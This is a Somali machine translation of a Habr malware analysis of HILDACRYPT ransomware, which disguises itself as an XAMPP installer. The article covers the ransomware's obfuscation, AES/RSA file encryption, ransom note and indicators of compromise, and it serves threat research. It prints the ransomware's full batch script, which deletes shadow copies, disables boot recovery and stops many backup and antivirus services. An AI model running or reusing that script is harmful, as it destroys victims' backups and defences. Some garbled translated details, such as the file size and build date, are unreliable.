Hello, Habr! Mar labaad, waxaan ka hadlaynaa noocyadii ugu dambeeyay ee malware-ka ee qeybta Ransomware. HILDACRYPT waa madax furasho cusub, xubin ka tirsan qoyska Hilda oo la helay Agoosto 2019, oo loogu magac daray kartoonka Netflix ee loo adeegsaday qaybinta software-ka. Maanta waxaan baraneynaa sifooyinka farsamada ee fayraskan la cusboonaysiiyay ee ransomware.
Nooca koowaad ee Hilda ransomware, isku xirka mid lagu dhejiyay Youtube taxane kartoon ah ayaa ku jiray warqadda madax furashada. HILDACRYPT waxay u ekaysiisay sidii rakibe XAMPP sharci ah, qaybinta Apache-fudud-fudud oo ay ku jiraan MariaDB, PHP, iyo Perl. Isla mar ahaantaana, cryptolocker wuxuu leeyahay magac fayl oo kala duwan - xamp. Intaa waxaa dheer, faylka ransomware ma laha saxeex elektaroonik ah.
Falanqaynta taagan
Madax furashadu waxay ku jirtaa faylka PE32 .NET oo u qoran MS Windows. Cabbirkiisu waa 135 bytes. Koodhka barnaamijka ugu weyn iyo koodhka barnaamijka difaaca labaduba waxay ku qoran yihiin C #. Marka loo eego taariikhda la soo ururiyey iyo shaambada wakhtiga, binary-ga waxa la sameeyay Sebtembar 168, 14.
Sida laga soo xigtay Detect It Easy, madax-furashada waxaa lagu kaydiyaa iyadoo la adeegsanayo Confuser iyo ConfuserEx, laakiin kuwan indho-indhayntu waxay la mid yihiin sidii hore, kaliya ConfuserEx ayaa ah beddelka Confuser, sidaa darteed saxiixyadooda code ayaa la mid ah.
HILDACRYPT runtii waxaa lagu soo baakadeeyay ConfuserEx.
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Weerar vector
Waxay u badan tahay, madaxfurasho waxaa laga helay mid ka mid ah shabakadaha barnaamijyada webka, isaga oo isu ekeysiiyay barnaamij XAMPP oo sharci ah.
Silsiladda caabuqa oo dhan waxaa lagu arki karaa gudaha .
Aflagaado
Xadhkaha furashada waxaa lagu kaydiyaa qaab sir ah. Markii la bilaabay, HILDACRYPT waxay kala saartaa iyaga iyadoo la isticmaalayo Base64 iyo AES-256-CBC.
Ku rakibida
Marka hore, madax furashada waxay ku abuurtaa gal gudaha% AppDataRoaming% kaas oo GUID (Identifier caalami ah oo u gaar ah) cabbirka si aan kala sooc lahayn loo soo saaray. Markaad ku darto faylka bat goobtan, fayraska ransomware wuxuu bilaabay isagoo isticmaalaya cmd.exe:
cmd.exe /c JKfgkgj3hjgfhjka.bat & ka bax
Waxay markaa bilaabaysaa fulinta qoraalka dufcaddii si ay u joojiso sifooyinka ama adeegyada nidaamka.
Qoraalku wuxuu ka kooban yahay liis dheer oo amarro ah oo baabi'iya nuqullada hadhku, baabi'iyo server-ka SQL, kaydinta iyo xalalka antivirus.
Tusaale ahaan, waxay isku daydaa inay ku guul darreysato inay joojiso adeegyada Acronis Backup. Intaa waxaa dheer, waxay weerartaa hababka kaydinta iyo xalalka antivirus ee iibiyeyaasha soo socda: Veeam, Sophos, Kaspersky, McAfee iyo kuwa kale.
@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
Marka adeegyada iyo hababka kor lagu soo sheegay ay naafo yihiin, cryptolocker-ku wuxuu ururiyaa macluumaadka ku saabsan dhammaan hababka socodsiinta iyadoo la adeegsanayo amarka liiska hawsha si loo hubiyo in dhammaan adeegyada lagama maarmaanka ah ay hoos u dhacaan.
liiska hawsha v/fo csv
Amarkani wuxuu muujinayaa liis faahfaahsan oo hababka socodsiinta ah, kuwaas oo curiyayaasha ay kala soocaan calaamadda ","
««csrss.exe»,«448»,«services»,«0»,«1�896 ��»,«unknown»,»�/�»,«0:00:03»,»�/�»»
Jeegaan ka dib, ransomware-ku waxa uu bilaabaa habka sirta
Qarsoodi
Sireeynta faylka
HILDACRYPT waxay dhex martaa dhammaan waxyaabaha la helay ee darawallada adag, marka laga reebo Recycle.Bin iyo Assemblies Tixraaca galkaMicrosoft. Kan dambe waxa uu ka kooban yahay faylal muhiim ah dll, pdb, iwm. oo loogu talagalay codsiyada .net ee saamayn kara hawlgalka madax furashada. Si loo raadiyo faylalka la qarin doono, liiska soo socda ee kordhinta ayaa la isticmaalaa:
«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»
Ransomware-ku wuxuu isticmaalaa AES-256-CBC algorithm si uu u xafido faylasha isticmaalaha. Cabbirka furuhu waa 256 bits iyo cabbirka bilowga ee vector (IV) waa 16 bytes.
Shaashada soo socota, qiyamka byte_2 iyo byte_1 ayaa lagu helay si aan kala sooc lahayn iyadoo la isticmaalayo GetBytes().
Furaha
ВИ
Faylka qarsoodiga ah wuxuu leeyahay kordhinta HCY!... Tani waa tusaale faylka la dajiyay Furaha iyo IV ee kor ku xusan ayaa loo sameeyay faylkan.
Qarsoodi furaha
Qalabka loo yaqaan 'cryptolocker' wuxuu ku kaydiyaa furaha AES ee la soo saaray fayl sir ah. Qaybta hore ee faylka la dajiyay ayaa leh madax ka kooban xog ay ka mid yihiin HILDACRYPT, KEY, IV, FileLen oo qaab XML ah, waxayna u egtahay sidan:
AES iyo IV sirta muhiimka ah waxaa lagu sameeyaa iyadoo la isticmaalayo RSA-2048, iyo codeeynta waxaa la sameeyaa iyadoo la isticmaalayo Base64. Furaha dadweynaha ee RSA waxa lagu kaydiyaa jidhka cryptolocker mid ka mid ah xargaha sirta ah ee qaabka XML.
28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB
Furaha dadweynaha ee RSA ayaa loo isticmaalaa si loo sireeyo furaha faylka AES. Furaha guud ee RSA waa Base64 oo la duubay oo ka kooban modules iyo jibbaar dadweyne oo ah 65537. Decryption waxay u baahan tahay furaha gaarka ah ee RSA, kaas oo uu haysto weerarka.
Ka dib sirta RSA, furaha AES waxaa lagu dhejiyay iyadoo la isticmaalayo Base64 oo lagu kaydiyay faylka sir ah.
Fariinta madax furashada
Marka sirtu dhammaato, HILDACRYPT waxay ku qortaa faylka html galka uu ku sireeyay faylalka. Ogeysiiska ransomware wuxuu ka kooban yahay laba ciwaan oo iimayl ah halkaasoo dhibbanuhu uu kala xiriiri karo qofka weerarka geystay.
Ogeysiiska baadda waxa kale oo ku jira xariiqda "Ma jiro loli waa badbaado;)" - tixraac ku saabsan jilayaasha anime iyo manga oo leh muuqaalka gabdhaha yaryar ee laga mamnuucay Japan.
gunaanad
HILDACRYPT, qoys cusub oo madax furasho ah, ayaa soo saaray nooc cusub. Qaabka sirtu waxa uu dhibbanaha ka ilaaliyaa in uu furfuro faylalka lagu siryay ransomware-ka. Cryptolocker waxay isticmaashaa habab ilaalin firfircoon si ay u joojiso adeegyada ilaalinta ee la xidhiidha nidaamyada kaydinta iyo xalalka ka hortagga. Qoraaga HILDACRYPT waa taageere taxanaha firfircoon ee Hilda ee lagu muujiyey Netflix, isku xirka trailer-ka kaas oo ku jiray warqadda iibsiga ee nuqulkii hore ee barnaamijka.
Sida caadiga, и waxay ka ilaalin kartaa kombuyuutarkaaga HILDACRYPT ransomware, bixiyayaashana waxay awood u leeyihiin inay macaamiishooda ku ilaaliyaan . Ilaalinta waxaa lagu hubiyaa xaqiiqda ah in xalalkan ay ku jiraan waxaa ku jira ma aha oo kaliya kaabta, laakiin sidoo kale nidaamka our ammaanka isku dhafan - Waxaa ku shaqeeya qaabka barashada mashiinka oo ku salaysan habdhaqanka dabeecadda, tignoolajiyada awood u leh inay ka hortagto khatarta ransomware-ka eber-maalin sinaba mid kale ma jiro.
Tilmaamayaasha tanaasulka
Fayl kordhin HCY!
HILDAACRYPTAkhriMe.html
xamp.exe oo leh hal xaraf "p" oo aan lahayn saxeex dhijitaal ah
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Source: www.habr.com